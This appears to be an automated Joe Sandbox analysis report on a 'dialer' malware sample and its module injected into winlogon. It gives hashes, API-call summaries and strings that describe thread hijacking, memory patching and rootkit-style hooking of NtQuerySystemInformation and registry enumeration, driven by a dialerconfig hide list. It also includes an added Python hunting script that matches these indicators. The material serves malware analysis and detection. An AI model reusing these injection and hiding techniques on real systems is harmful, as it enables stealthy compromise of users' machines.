                          • Opcode ID: 33f89feb9858a4e39e6e7226b1872fe8dc0a47489d7e71beaca7a62b826bfc15
                          • Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
                          • Opcode Fuzzy Hash: 33f89feb9858a4e39e6e7226b1872fe8dc0a47489d7e71beaca7a62b826bfc15
                          • Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000034.00000002.2189427707.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000034.00000002.2189357839.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                          • Associated: 00000034.00000002.2189457407.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                          • Associated: 00000034.00000002.2189497850.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                          • String ID:
                          • API String ID: 3197395349-0
                          • Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                          • Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
                          • Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                          • Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40

                          Control-flow Graph

                          Control-flow graph data for the function at 140002b38-140002bf4 (rendered graph not preserved): GetProcessHeap and HeapAlloc twice at 140002b38, then a polling loop of K32EnumProcesses (140002b8e), a scan over the returned PID array (140002ba3-140002bdc) and Sleep (140002beb); the loop repeats until the scan returns.
                          APIs
                          Memory Dump Source
                          • Source File: 00000034.00000002.2189427707.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000034.00000002.2189357839.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                          • Associated: 00000034.00000002.2189457407.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                          • Associated: 00000034.00000002.2189497850.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: Heap$AllocProcess$EnumProcessesSleep
                          • String ID:
                          • API String ID: 3676546796-0
                          • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                          • Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
                          • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                          • Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40

                          Control-flow Graph

                          Control-flow graph data for the function at 140002a90-140002b34 (rendered graph not preserved): CreateFileW (140002a90); on success WriteFile (140002ada), a conditional second WriteFile (140002b02) and CloseHandle (140002b1c); return at 140002b25.
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000034.00000002.2189427707.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000034.00000002.2189357839.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                          • Associated: 00000034.00000002.2189457407.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                          • Associated: 00000034.00000002.2189497850.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: File$Write$CloseCreateHandle
                          • String ID: \\.\pipe\dialercontrol_redirect64
                          • API String ID: 148219782-3440882674
                          • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                          • Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
                          • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                          • Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000034.00000002.2189427707.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000034.00000002.2189357839.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                          • Associated: 00000034.00000002.2189457407.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                          • Associated: 00000034.00000002.2189497850.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: ntdll.dll
                          • API String ID: 1646373207-2227199552
                          • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                          • Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
                          • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                          • Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

                          Execution Graph

                          Execution Coverage:1.3%
                          Dynamic/Decrypted Code Coverage:94.4%
                          Signature Coverage:0%
                          Total number of Nodes:107
                          Total number of Limit Nodes:16
                          Execution graph data for the module at 1e8589b0000 inside winlogon (rendered graph not preserved). Nodes reached at run time, grouped by entry point, with the API calls recorded on them:
                          • 1e8589b5cf0: SetThreadContext (1e8589b5d66); VirtualProtect, FlushInstructionCache (1e8589b5e41); VirtualFree (1e8589b43e0); 1e8589b4df0: GetCurrentProcess, then VirtualProtect and FlushInstructionCache in a loop (1e8589b4e22); ResumeThread (1e8589b5f37); 1e8589b7940: IsProcessorFeaturePresent, RtlCaptureContext, RtlLookupFunctionEntry, capture_previous_context
                          • 1e8589b3ab9: VirtualQuery (1e8589b3a56), VirtualAlloc (1e8589b3a8a), GetLastError (1e8589b3abb)
                          • 1e8589e273c and 1e85898273c: VirtualAlloc (1e8589e27c5, 1e8589827c5); the latter also LoadLibraryA (1e858982858)
                          • 1e8589b28c8: StrCmpNIW via 1e8589b3844
                          • 1e8589b554d: VirtualProtect (1e8589b5637), GetLastError (1e8589b5663)
                          • 1e8589b1abc: 1e8589b1628 (GetProcessHeap, _invalid_parameter_noinfo, four calls into 1e8589b1268, which itself calls GetProcessHeap twice around 1e8589c6168); then a chain of nine RegOpenKeyExW calls (1e8589b168e through 1e8589b1861), each followed either by 1e8589b12bc (11 API calls, 2 library calls) or by 1e8589b104c (RegQueryInfoKeyW, a RegEnumValueW loop with GetProcessHeap, _invalid_parameter_noinfo and __free_lconv_num, RegCloseKey) and a RegCloseKey; afterwards a loop of Sleep, SleepEx (1e8589b1ad2), 1e8589b1598 (StrCmpIW, StrCmpW) and 1e8589b18b4 (9 API calls)

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                          • API String ID: 106492572-2879589442
                          • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                          • Instruction ID: f0632be5b56d1d045c33e69aedb8194d200da67af966bba0f518d50e3ad8fab5
                          • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                          • Instruction Fuzzy Hash: 9171D636324A90CAEB11AF66E8907DDB7A4FF84B89F401126DE4E57B69EF39C444C740
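A hunting check for the artifacts recovered above, added here as an example that is not part of the Joe Sandbox report or of the analysed sample: it scans Sysmon-style events for pipe creation and connection (Event IDs 17 and 18), registry key and value changes (IDs 12 and 13), CreateRemoteThread (ID 8) and ProcessAccess (ID 10), and flags the two pipe names, the SOFTWARE\dialerconfig key with its value names (paths, pid, process_names, service_names, startup, tcp_local, tcp_remote, udp), the MSBuild.exe and dialer.exe injection targets, and access to winlogon.exe, all of which appear in the string tables of the dialer module and of the winlogon-injected stage. The one-line key=value event format and the sample events are constructed for the example; real Sysmon data would have to be flattened into that shape from the Microsoft-Windows-Sysmon/Operational channel first.

```python
"""Offline hunt for the dialer artifacts recovered in this report.

Added example, not part of the Joe Sandbox report or of the analysed sample.
Events are modelled as one 'Key=value Key="quoted value"' line each; the
sample lines below are constructed for the example. Real Sysmon data comes
from the Microsoft-Windows-Sysmon/Operational channel and would be flattened
into this shape first.
"""
import re

# Artifacts taken from the string tables shown in the report.
PIPE_NAMES = {r"\dialerchildproc64", r"\dialercontrol_redirect64"}
CONFIG_KEY = r"SOFTWARE\dialerconfig"
CONFIG_VALUES = {"paths", "pid", "process_names", "service_names",
                 "startup", "tcp_local", "tcp_remote", "udp"}
INJECTION_TARGETS = {"msbuild.exe", "dialer.exe"}

# Sysmon event IDs (documented Sysmon semantics).
PIPE_CREATED, PIPE_CONNECTED = 17, 18
REG_KEY_CREATE_DELETE, REG_VALUE_SET = 12, 13
CREATE_REMOTE_THREAD, PROCESS_ACCESS = 8, 10

_KV = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line):
    """Split one key=value line into a dict; EventID becomes an int."""
    fields = {k: v.strip('"') for k, v in _KV.findall(line)}
    fields["EventID"] = int(fields.get("EventID", 0))
    return fields


def _basename(path):
    """Last path component, lower-cased, for image comparisons."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev):
    """Return the indicator tags one parsed event triggers (empty if none)."""
    tags = []
    eid = ev["EventID"]
    if eid in (PIPE_CREATED, PIPE_CONNECTED):
        if ev.get("PipeName", "").lower() in {p.lower() for p in PIPE_NAMES}:
            tags.append("dialer_named_pipe")
    if eid in (REG_KEY_CREATE_DELETE, REG_VALUE_SET):
        # TargetObject looks like HKLM\SOFTWARE\dialerconfig\process_names
        target = ev.get("TargetObject", "")
        if CONFIG_KEY.lower() in target.lower():
            tags.append("dialerconfig_registry_key")
            value_name = target.rsplit("\\", 1)[-1].lower()
            if eid == REG_VALUE_SET and value_name in CONFIG_VALUES:
                tags.append("dialerconfig_value:" + value_name)
    if eid in (CREATE_REMOTE_THREAD, PROCESS_ACCESS):
        target_image = _basename(ev.get("TargetImage", ""))
        if target_image in INJECTION_TARGETS:
            tags.append("injection_target")
        if target_image == "winlogon.exe":
            tags.append("access_to_winlogon")
    return tags


def scan(lines):
    """Return [(line_number, tags)] for every line matching at least one indicator."""
    hits = []
    for number, line in enumerate(lines, 1):
        tags = classify(parse_event(line))
        if tags:
            hits.append((number, tags))
    return hits


# Constructed sample events, not taken from the report's own logs.
SAMPLE_EVENTS = [
    r'EventID=17 Image="C:\Users\user\Desktop\dialer.exe" PipeName=\dialercontrol_redirect64',
    r'EventID=18 Image="C:\Windows\System32\svchost.exe" PipeName=\PIPE_EVENTROOT\CIMV2SCM',
    r'EventID=13 Image="C:\Users\user\Desktop\dialer.exe" TargetObject=HKLM\SOFTWARE\dialerconfig\process_names Details=MSBuild.exe',
    r'EventID=12 Image="C:\Users\user\Desktop\dialer.exe" TargetObject=HKLM\SOFTWARE\dialerconfig',
    r'EventID=8 SourceImage="C:\Users\user\Desktop\dialer.exe" TargetImage="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"',
    r'EventID=10 SourceImage="C:\Users\user\Desktop\dialer.exe" TargetImage="C:\Windows\System32\winlogon.exe"',
    r'EventID=1 Image="C:\Windows\System32\notepad.exe" CommandLine=notepad.exe',
]

if __name__ == "__main__":
    for number, tags in scan(SAMPLE_EVENTS):
        print(f"event {number}: {', '.join(tags)}")
```

The pipe names are matched exactly because the module hard-codes them; the registry match is a substring test on the key path so that both the key itself (ID 12) and any value under it (ID 13) are caught, and value names are only reported when they belong to the set the winlogon stage reads.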

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: CurrentProcessProtectVirtual$HandleModule
                          • String ID: wr
                          • API String ID: 1092925422-2678910430
                          • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                          • Instruction ID: 5c25a885d6fb7882426ca4c2d651152bb887428ee6332336122a0b4e2170aac2
                          • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                          • Instruction Fuzzy Hash: 51112A367287C1C6EB159B22E4043ADB7A0FB48B86F44003ADE8D07754EF2EC505C704

                          Control-flow Graph

                          Control-flow graph data for the function at 1e8589b5b30-1e8589b5fc6 (rendered graph not preserved). API calls in address order, with internal calls named by address:
                          • 1e8589b5b6b: GetCurrentThreadId
                          • 1e8589b5b8b: call 1e8589b5960
                          • 1e8589b5bd5: call 1e8589b85c0; 1e8589b5c1a: calls 1e8589b4510, 1e8589b44b0, 1e8589b4470 (loop back to 1e8589b5bbe)
                          • 1e8589b5cbc: GetThreadContext
                          • 1e8589b5d3e: call 1e8589b3970, SetThreadContext
                          • 1e8589b5dc5: call 1e8589b3900; 1e8589b5e10: call 1e8589b74dd
                          • 1e8589b5e1f: call 1e8589b74bf
                          • 1e8589b5e41: VirtualProtect, FlushInstructionCache; 1e8589b5ea6: call 1e8589b4390; 1e8589b5ec9: call 1e8589b78ac (loop back to 1e8589b5e35)
                          • 1e8589b5f19: call 1e8589b43e0; 1e8589b5f1e: call 1e8589b4df0
                          • 1e8589b5f37: ResumeThread, call 1e8589b78ac (loop back to 1e8589b5f2f)
                          • 1e8589b5faf: call 1e8589b7940 (common exit)
                          APIs
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: Thread$Current$Context
                          • String ID:
                          • API String ID: 1666949209-0
                          • Opcode ID: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
                          • Instruction ID: 5d1d641fdfe7a921bc40b2274792ee65e942fd43df3d51391b1333f61c708ac4
                          • Opcode Fuzzy Hash: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
                          • Instruction Fuzzy Hash: 06D18976219B88C6DB709B46E49439EB7A1F7C8B85F100227EE8D47BA5DF38C551CB40

                          Control-flow Graph

                          Control-flow graph (figure; nodes marked Executed / Not Executed): basic blocks 1e8589b50d0-1e8589b56da; API calls shown: GetCurrentThreadId, VirtualProtect, GetLastError; internal calls: 1e8589b56e0 (x2), 1e8589b7870, 1e8589b4390, 1e8589b78ac, 1e8589b3cc0, 1e8589b8c60, 1e8589b7440, 1e8589b4060, 1e8589b4590, 1e8589b85c0, 1e8589b4510, 1e8589b4470
                          APIs
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: CurrentThread
                          • String ID:
                          • API String ID: 2882836952-0
                          • Opcode ID: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
                          • Instruction ID: 540203665ef2c2292df768c22022c8278d109779f1dd1d0b06d3c86d73575d79
                          • Opcode Fuzzy Hash: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
                          • Instruction Fuzzy Hash: 1302A53622DBC4CAEB60CB55E49439EF7A1F784795F104126EA8E87BA9DF78C454CB00

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: Virtual$AllocQuery
                          • String ID:
                          • API String ID: 31662377-0
                          • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                          • Instruction ID: 09cf3f19013970cc5edba0ff51850c5c12277f20bdc89c750177569444b008a5
                          • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                          • Instruction Fuzzy Hash: BC31F13222DAC4C9EA70DA15E45539EF6E4FB88785F200536E9CD46BA9DF7CC5409B04

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                          • String ID:
                          • API String ID: 1683269324-0
                          • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                          • Instruction ID: d7f8704d464420a2ce37a06b3bc325ee32576ad6341c0f5012ed89367f689b04
                          • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                          • Instruction Fuzzy Hash: 431180306386C1CAFB60EB62F9493DEF2D4AF54346F94413F9D0E81595EF79D4449600

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                          • String ID:
                          • API String ID: 3733156554-0
                          • Opcode ID: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                          • Instruction ID: 22019e5aebe169b3d70db300553c4eca4bdb0326af0d5ecbc3d97933e7c21ec8
                          • Opcode Fuzzy Hash: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                          • Instruction Fuzzy Hash: 50F0BD76228A84C5D6309B45E45179EFBA1EB88BE5F144126BE8D47B69CE38C5908B40

                          Control-flow Graph

                          Control-flow graph (figure; nodes marked Executed / Not Executed): basic blocks 1e85898273c-1e8589829d0; API calls shown: VirtualAlloc, LoadLibraryA; internal calls: 1e8589829d4 (x4)
                          APIs
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293552405.000001E858980000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e858980000_winlogon.jbxd
                          Similarity
                          • API ID: AllocLibraryLoadVirtual
                          • String ID:
                          • API String ID: 3550616410-0
                          • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                          • Instruction ID: 54f6f79a6e3174aa67926fcea571029873fefd45f025aae229484734b2b22b08
                          • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                          • Instruction Fuzzy Hash: B461DD32B21692CBDB548F95D2007ADF3A2FB54BA4F588136DE5E07788DE39D852CB00

                          Control-flow Graph

                          APIs
                            • Part of subcall function 000001E8589B1628: GetProcessHeap.KERNEL32 ref: 000001E8589B1633
                            • Part of subcall function 000001E8589B1628: HeapAlloc.KERNEL32 ref: 000001E8589B1642
                            • Part of subcall function 000001E8589B1628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589B16B2
                            • Part of subcall function 000001E8589B1628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589B16DF
                            • Part of subcall function 000001E8589B1628: RegCloseKey.ADVAPI32 ref: 000001E8589B16F9
                            • Part of subcall function 000001E8589B1628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589B1719
                            • Part of subcall function 000001E8589B1628: RegCloseKey.ADVAPI32 ref: 000001E8589B1734
                            • Part of subcall function 000001E8589B1628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589B1754
                            • Part of subcall function 000001E8589B1628: RegCloseKey.ADVAPI32 ref: 000001E8589B176F
                            • Part of subcall function 000001E8589B1628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589B178F
                            • Part of subcall function 000001E8589B1628: RegCloseKey.ADVAPI32 ref: 000001E8589B17AA
                            • Part of subcall function 000001E8589B1628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589B17CA
                          • Sleep.KERNEL32 ref: 000001E8589B1AD7
                          • SleepEx.KERNELBASE ref: 000001E8589B1ADD
                            • Part of subcall function 000001E8589B1628: RegCloseKey.ADVAPI32 ref: 000001E8589B17E5
                            • Part of subcall function 000001E8589B1628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589B1805
                            • Part of subcall function 000001E8589B1628: RegCloseKey.ADVAPI32 ref: 000001E8589B1820
                            • Part of subcall function 000001E8589B1628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589B1840
                            • Part of subcall function 000001E8589B1628: RegCloseKey.ADVAPI32 ref: 000001E8589B185B
                            • Part of subcall function 000001E8589B1628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589B187B
                            • Part of subcall function 000001E8589B1628: RegCloseKey.ADVAPI32 ref: 000001E8589B1896
                            • Part of subcall function 000001E8589B1628: RegCloseKey.ADVAPI32 ref: 000001E8589B18A0
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: CloseOpen$HeapSleep$AllocProcess
                          • String ID:
                          • API String ID: 1534210851-0
                          • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                          • Instruction ID: 06e8169f9804a98201475c8f763f238f1302acfb2d082d9a4a6838d138c42db4
                          • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                          • Instruction Fuzzy Hash: 9C31F9712296D5CAEB54BB66DA453FDB3A8AF84BC2F1454339E0D8729AFE20C8518210

                          Control-flow Graph

                          Control-flow graph (figure; nodes marked Executed / Not Executed): basic blocks 1e8589e273c-1e8589e29d0; API calls shown: VirtualAlloc; internal calls: 1e8589e29d4 (x4)
                          APIs
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293641040.000001E8589E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589e0000_winlogon.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                          • Instruction ID: baa815a1b03312b63bd3d1551ce62b2d561b23967e9983693c765027a066309d
                          • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                          • Instruction Fuzzy Hash: 5E61DD72B21690C7EB548F95D1407ADFBA2FB54BA4F589132EE5D07788DE38D862C700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                          • API String ID: 2119608203-3850299575
                          • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                          • Instruction ID: 66d3cc7fa703628ffd88a958204c6c3eae92163f900264158483d38a9f943711
                          • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                          • Instruction Fuzzy Hash: 31B14732228AD0CAEBA59FA6D8507EDF3A5FB84B86F445027EE0D57B94DE75C840C740
                          APIs
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                          • String ID:
                          • API String ID: 3140674995-0
                          • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                          • Instruction ID: d4e1efc638050b926f9574cf9333cc024f10501de906563db633245b72e59a7c
                          • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                          • Instruction Fuzzy Hash: 6C313B76229BC0DAEB609F60E8807EDB764FB84745F44452ADE4E57B98EF38C648C710
                          APIs
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                          • String ID:
                          • API String ID: 1239891234-0
                          • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                          • Instruction ID: fe4fedf686d99ec42a62814e82a9535f6f48c61b48166fa88bd6cf84dd123d16
                          • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                          • Instruction Fuzzy Hash: D4314E36224BC0DAEB649F25E8403EEB7A4FB89755F50012AEE9D53B55DF38C545CB00

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                          • String ID: d
                          • API String ID: 2005889112-2564639436
                          • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                          • Instruction ID: c7e4212cc5d13ccfdc5b6c4001ea65b39e9a5bd1eb85d2e12a93a934f0025c5e
                          • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                          • Instruction Fuzzy Hash: 83512B76224BC4CAEB55DF62E54439EBBA1FB89B96F04413ADE4907758DF39C0458700

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: CurrentThread$AddressHandleModuleProc
                          • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                          • API String ID: 4175298099-1975688563
                          • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                          • Instruction ID: 307e4caf8f773ededbd49a1d779e4008e5bf6fc61e17ee7f67eba446ce0af824
                          • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                          • Instruction Fuzzy Hash: B131A274535ACAE4EA05EFA5EC527ECF720FF84346F8040739C1D125669F79864AC750

                          Control-flow Graph

